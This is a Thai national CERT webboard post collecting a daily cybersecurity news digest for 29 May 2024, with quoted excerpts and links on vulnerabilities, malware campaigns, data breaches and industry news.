NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 29 May 2024

    Cyber Security News
    2
    1
    82
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย NCSA_THAICERT

      Industrial Sector
      • Campbell Scientific CSI Web Server
        "Successful exploitation of these vulnerabilities could allow an attacker to download files and decode stored passwords."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-149-01
      Vulnerabilities

      • Exploit Released For Maximum Severity Fortinet RCE Bug, Patch Now
        "​Security researchers have released a proof-of-concept (PoC) exploit for a maximum-severity vulnerability in Fortinet's security information and event management (SIEM) solution, which was patched in February. Tracked as CVE-2024-23108, this security flaw is a command injection vulnerability discovered and reported by Horizon3 vulnerability expert Zach Hanley that enables remote command execution as root without requiring authentication."
        https://www.bleepingcomputer.com/news/security/exploit-released-for-maximum-severity-fortinet-rce-bug-patch-now/
        https://securityaffairs.com/163797/hacking/fortinet-siem-critical-rce-poc.html

      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation."
        https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-adds-one-known-exploited-vulnerability-catalog

      • Unauthenticated XSS Vulnerability Patched In Slider Revolution Plugin
        "Slider Revolution came to us with a request to audit their product for potential vulnerabilities since they wanted to make sure that their users’ websites were not vulnerable to an attack. This blog post discusses our audit findings, which we have been authorized to publicize. If you're a Slider Revolution user, please update the plugin to version 6.7.11 or higher."
        https://patchstack.com/articles/unauthenticated-xss-vulnerability-patched-in-slider-revolution-plugin/
        https://www.infosecurity-magazine.com/news/xss-flaws-wordpress-plugin-slider/

      Malware

      • Server Side Credit Card Skimmer Lodged In Obscure Plugin
        "Attackers are always finding new ways to inject malware into websites and new ways to obscure it to avoid detection, but they’re always up to their same old tricks. In this post, we’ll explore how attackers are using a very obscure PHP snippet WordPress plugin to install server-side malware to harvest credit card details from a WooCommerce online store."
        https://blog.sucuri.net/2024/05/server-side-credit-card-skimmer-lodged-in-obscure-plugin.html
        https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html
        https://securityaffairs.com/163777/malware/wordpress-plugin-insert-e-skimmer.html

      • Technical Analysis Of Anatsa Campaigns: An Android Banking Malware Active In The Google Play Store
        "At Zscaler ThreatLabz, we regularly monitor the Google Play store for malicious applications. Over the past few months, we identified and analyzed more than 90 malicious applications uploaded to the Google Play store. These malware-infected applications have collectively garnered over 5.5 million installs."
        https://www.zscaler.com/blogs/security-research/technical-analysis-anatsa-campaigns-android-banking-malware-active-google
        https://www.bleepingcomputer.com/news/security/over-90-malicious-android-apps-with-55m-installs-found-on-google-play/
        https://www.darkreading.com/endpoint-security/90-malicious-apps-55-million-downloads-google-play
        https://www.infosecurity-magazine.com/news/teabot-banking-trojan-activity/

      • Moonstone Sleet Emerges As New North Korean Threat Actor With New Bag Of Tricks
        "Microsoft has identified a new North Korean threat actor, now tracked as Moonstone Sleet (formerly Storm-1789), that uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies to target companies for its financial and cyberespionage objectives. Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a malicious game, and deliver a new custom ransomware."
        https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
        https://www.bleepingcomputer.com/news/microsoft/microsoft-links-moonstone-sleet-north-korean-hackers-to-new-fakepenny-ransomware/
        https://www.bankinfosecurity.com/microsoft-warns-north-koreas-moonstone-sleet-a-25344

      • Threats That Hide In Your Microsoft Office Documents
        "Microsoft Office documents in the Office365 software suite have become a mainstay for many users who need to create documents for business reports, college essays, resumes, essential notetaking, and even strategic analyses. Office documents offer a wide range of not only text but data editing software solutions that include technologies that introduce algorithmic logic via a macro or, more recently, with the integration of Python scripting being added to Excel for a more dynamic and logical way of interpreting, editing, and displaying data."
        https://cofense.com/blog/threats-that-hide-in-your-microsoft-office-documents/

      • CatDDoS-Related Gangs Have Seen a Recent Surge In Activity
        "XLab's CTIA(Cyber Threat Insight Analysis) System continuously tracks and monitors the active mainstream DDoS botnets. Recently, our system has observed that CatDDoS-related gangs remain active and have exploited over 80 vulnerabilities over the last three months. Additionally, the maximum number of targets has been observed to exceed 300+ per day. So we decided to share some recent data with the community for reference."
        https://blog.xlab.qianxin.com/catddos-derivative-en/
        https://thehackernews.com/2024/05/researchers-warn-of-catddos-botnet-and.html
        https://www.darkreading.com/cyberattacks-data-breaches/catddos-threat-groups-sharply-ramp-up-ddos-attacks

      • Breach Forums Return To Clearnet And Dark Web Despite FBI Seizure
        "Breach Forums returns to the clearnet and dark web just two weeks after the FBI seized its infrastructure and arrested two administrators. One of the admins, ShinyHunters, regained domains despite the FBI’s efforts, highlighting significant operational setbacks and security lapses."
        https://www.hackread.com/breach-forums-return-clearnet-dark-web-fbi-seizure/
        https://www.theregister.com/2024/05/28/breachforums_back_online/

      • Trusted Relationship Attacks: Trust, But Verify
        "IT outsourcing market continues to demonstrate strong growth globally – such services are becoming increasingly popular. But along with the advantages, such as saved time and resources, delegating non-core tasks creates new challenges in terms of information security. By providing third-party companies (service providers or contractors) with access to their infrastructure, businesses increase the risk of trusted relationship attacks – T1199 in the MITRE ATT&CK classification."
        https://securelist.com/trusted-relationship-attack/112731/

      • From Origins To Operations: Understanding Black Basta Ransomware
        "Since its emergence in 2022, Black Basta has targeted over 500 organizations worldwide, leveraging sophisticated tactics to become a leading ransomware threat. Here’s a look at their methods of operation, notable attacks, and the potential future of this formidable cybercriminal group."
        https://flashpoint.io/blog/understanding-black-basta-ransomware/

      • SharpPanda APT Targets Malaysia With Backdoor Malware
        "In a recent analysis conducted in March and April 2024, the NetbyteSEC Detecx (NBS) team exposed a sophisticated malware campaign orchestrated by the notorious SharpPanda APT group, specifically aimed at targets in Malaysia. The malicious executable, disguised as a harmless Microsoft Word document titled “REKOD MINIT KSN KEPADA YAB PM 2023 – 15.exe,” was designed to establish a backdoor connection, granting attackers unauthorized access to compromised systems."
        https://securityonline.info/sharppanda-apt-targets-malaysia-with-backdoor-malware/
        https://notes.netbytesec.com/2024/05/inside-sharppandas-malware-targeting.html

      Breaches/Hacks/Leaks

      • First American December Data Breach Impacts 44,000 People
        "​First American Financial Corporation, the second-largest title insurance company in the United States, revealed Tuesday that a December cyberattack led to a breach impacting 44,000 individuals. Founded in 1889, it provides financial and settlement services to real estate professionals, home buyers, and sellers involved in residential and commercial property transactions. The California-based company has over 21,000 employees and reported a total revenue of $6 billion last year."
        https://www.bleepingcomputer.com/news/security/first-american-december-data-breach-impacts-44-000-people/

      • Hackers Claim Ticketmaster Data Breach: 560M Users’ Info For Sale At $500K
        "ShinyHunters hacking group has claimed to have breached Ticketmaster, stealing the personal data of 560 million users. The 1.3 TB of stolen data also includes payment details. Learn more about this major cybersecurity incident and its implications."
        https://www.hackread.com/hackers-ticketmaster-data-breach-560m-users-sale/

      • ABN Amro Client Data Possibly Stolen In AddComm Ransomware Attack
        "Dutch bank ABN Amro says client data may have been compromised in a ransomware attack at third-party services provider AddComm. The third-party provider announced that the incident has been contained and that the attackers no longer have access to its systems, which have since been restored, but could not confirm what type of data may have been stolen during the attack."
        https://www.securityweek.com/abn-amro-client-data-possibly-stolen-in-addcomm-ransomware-attack/

      • Ransomware Attack On Seattle Public Library Knocks Out Online Systems
        "A ransomware attack on the Seattle Public Library has brought services to a halt — knocking out the wireless network, computers for staff and patrons, and the entire online catalog. The incident began on Saturday, the organization said in a statement on Monday afternoon. The library has 27 different branches serving nearly 800,000 residents."
        https://therecord.media/ransomware-attack-seattle-knocks-out

      • Major Russian Delivery Company Down For Three Days Due To Cyberattack
        "A little-known hacker group claimed responsibility for an attack that has disrupted service for days at CDEK, one of Russia’s largest delivery companies. The Russian-speaking hackers, who call themselves Head Mare, said they encrypted the company’s servers with ransomware and destroyed backup copies of its corporate systems."
        https://therecord.media/russian-delivery-company-cdek-down-cyberattack

      • Christie’s Confirms Breach After RansomHub Threatens To Leak Data
        "Christie's confirmed that it suffered a security incident earlier this month after the RansomHub extortion gang claimed responsibility and threatened to leak stolen data. Christie's is a prominent auction house with a history spanning 2.5 centuries. It operates in 46 countries and specializes in selling art, luxury items, and high-valued collectibles."
        https://www.bleepingcomputer.com/news/security/christies-confirms-breach-after-ransomhub-threatens-to-leak-data/
        https://therecord.media/christies-cyberattack-ransomhub-claims
        https://www.securityweek.com/christies-confirms-data-breach-after-ransomware-group-claims-attack/
        https://securityaffairs.com/163808/cyber-crime/christie-data-breach.html
        https://www.nytimes.com/2024/05/27/arts/design/hackers-claim-christies-attack.html
        https://www.theregister.com/2024/05/28/christies_confirms_cybercriminals_stole_client/

      General News

      • The Evolution Of Security Metrics For NIST CSF 2.0
        "CISOs have long been spreadsheet aficionados, soaking up metrics and using them as KPIs for security progress. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. The NIST Cybersecurity Framework (CSF) 2.0 underscored that metrics like these alone are insufficient and probably even improper when used as proxies for security outcomes."
        https://www.helpnetsecurity.com/2024/05/28/cisos-security-metrics-nist-csf-2-0/

      • How To Combat Alert Fatigue In Cybersecurity
        "In this Help Net Security interview, Ken Gramley, CEO at Stamus Networks, discusses the primary causes of alert fatigue in cybersecurity and DevOps environments. Alert fatigue results from the overwhelming volume of event data generated by security tools, the prevalence of false positives, and the lack of clear event prioritization and actionable guidance."
        https://www.helpnetsecurity.com/2024/05/28/ken-gramley-stamus-networks-alert-fatigue/

      • Widespread Data Silos Slow Down Security Response Times
        "Although the goals and challenges of IT and security professionals intersect, 72% report security data and IT data are siloed in their organization, which contributes to corporate misalignment and elevated security risk, according to Ivanti."
        https://www.helpnetsecurity.com/2024/05/28/data-silos-problem-for-organizations/

      • 34% Of Organizations Lack Cloud Cybersecurity Skills
        "Incident response today is too time consuming and manual, leaving organizations vulnerable to damage due to their inability to efficiently investigate and respond to identified threats, according to Cado Security."

      https://www.helpnetsecurity.com/2024/05/28/cloud-visibility-challenges/

      • #Infosec2024: Why Human Risk Management Is Cybersecurity's Next Step For Awareness
        "Amid frequent warnings about the advanced capabilities of cyber threat actors, targeting human frailties remains the primary initial access method for attackers. This reality has led to the development of human risk management (HRM), a concept that places a focus on targeted, intelligence led interventions to improve security behaviors."
        https://www.infosecurity-magazine.com/news/human-risk-management/

      • Take Two APIs And Call Me In The Morning: How Healthcare Research Can Cure Cyber Crime
        "Some ideas work better than others. Take DARPA, the US Defense Advanced Research Projects Agency. Launched by US President Dwight Eisenhower in 1957 response to Sputnik, its job is to create and test concepts that may be useful in thwarting enemies. Along the way, it's helped make happen GPS, weather satellites, PC technology, and something called the internet."
        https://www.theregister.com/2024/05/28/take_two_apis_and_call/

      • US Govt Sanctions Cybercrime Gang Behind Massive 911 S5 Botnet
        "The U.S. Treasury Department has sanctioned a cybercrime network comprising three Chinese nationals and three Thailand-based companies linked to a massive botnet controlling a residential proxy service known as "911 S5." Researchers at the Canadian University of Sherbrooke revealed almost two years ago, in June 2022, that this illegitimate residential proxy service lured potential victims by offering free VPN services to install malware designed to add their IP addresses to the 911 S5 botnet."
        https://www.bleepingcomputer.com/news/security/us-govt-sanctions-cybercrime-gang-behind-massive-911-s5-proxy-botnet-linked-to-illegitimate-residential-proxy-service/
        https://home.treasury.gov/news/press-releases/jy2375
        https://therecord.media/us-sanctions-chinese-botnet-proxy
        https://www.bankinfosecurity.com/us-sanctions-chinese-national-for-running-911-s5-botnet-a-25340

      • Russian Indicted For Selling Access To US Corporate Networks
        "A 31-year-old Russian national named Evgeniy Doroshenko has been indicted for wire and computer fraud in the United States for allegedly acting as an "initial access broker" from February 2019 to May 2024. An initial access broker (IAB) is a threat actor who breaches corporate networks and then sells that access to other threat actors, who commonly use the access to conduct data theft or ransomware attacks."
        https://www.bleepingcomputer.com/news/security/russian-indicted-for-selling-access-to-us-corporate-networks/

      • From Phish To Phish Phishing: How Email Scams Got Smart
        "If only things were this easy. There’s never been a time where phishing was good, but there was certainly a time where phishing seemed quaint. Back in the 1990s, and even up until the last few years, phishing as a concept was marked more by comical errors than it was by pure evil. We’ve seen them all. The ALL CAPS subject lines. The grammar, or lack thereof. The horrible spoof jobs. You may have gotten these emails in the 1990s. You may have gotten these emails in the last few months."
        https://blog.checkpoint.com/security/from-phish-to-phish-phishing-how-email-scams-got-smart/

      • The SEC's New Take On Cybersecurity Risk Management
        "The advent of generative AI is surfacing new risks, significantly raising the stakes for businesses around the globe and for marketplace stability. In reaction to the logarithmic growth of cybercrime, the guidance and regulatory landscape is changing rapidly. While historically, the United States preferred frameworks over regulation, in 2023 there was a significant regulatory development: the introduction of new cybersecurity rules by the Securities and Exchange Commission (SEC)."
        https://www.darkreading.com/cyberattacks-data-breaches/secs-new-take-on-cybersecurity-risk-management

      • Social Distortion: The Threat Of Fear, Uncertainty And Deception In Creating Security Risk
        "In offensive security, there are a range of organization specific vulnerabilities that create risk, from software/hardware vulnerabilities, to processes and people. Attackers target and prey on any weakness they can identify. While Red Teams can expose and root out organization specific weaknesses, there is another growing class of vulnerability at an industry level. It’s not a single actor, vulnerability or intentionally malicious campaign. It manifests from governmental requirements and policy interference, to overblown, sometimes false alarms about technology safety, to active efforts to undermining research or authoritative industry voices."
        https://www.securityweek.com/social-distortion-the-threat-of-fear-uncertainty-and-deception-in-creating-security-risk/

      • Indian National Pleads Guilty To Wire Fraud Conspiracy For Stealing Over $37 Million By Spoofing Coinbase's Website
        "Chirag Tomar, 30, a citizen of the Republic of India, appeared before U.S. Magistrate Judge Susan C. Rodriguez today and pleaded guilty to federal charges for stealing more than $37 million through a spoofing scheme of the Coinbase website, announced Dena J. King, U.S. Attorney for the Western District of North Carolina. Tomar was arrested at the Atlanta airport on Dec. 20, 2023, upon entering the United States, and remains in federal custody."
        https://www.justice.gov/usao-wdnc/pr/indian-national-pleads-guilty-wire-fraud-conspiracy-stealing-over-37-million-spoofing
        https://www.bleepingcomputer.com/news/security/indian-man-stole-37-million-in-crypto-using-fake-coinbase-pro-site/
        https://thehackernews.com/2024/05/indian-national-pleads-guilty-to-37.html

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) d2b5e0d6-ccc1-4d67-8ae3-ed4f676cfc90-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post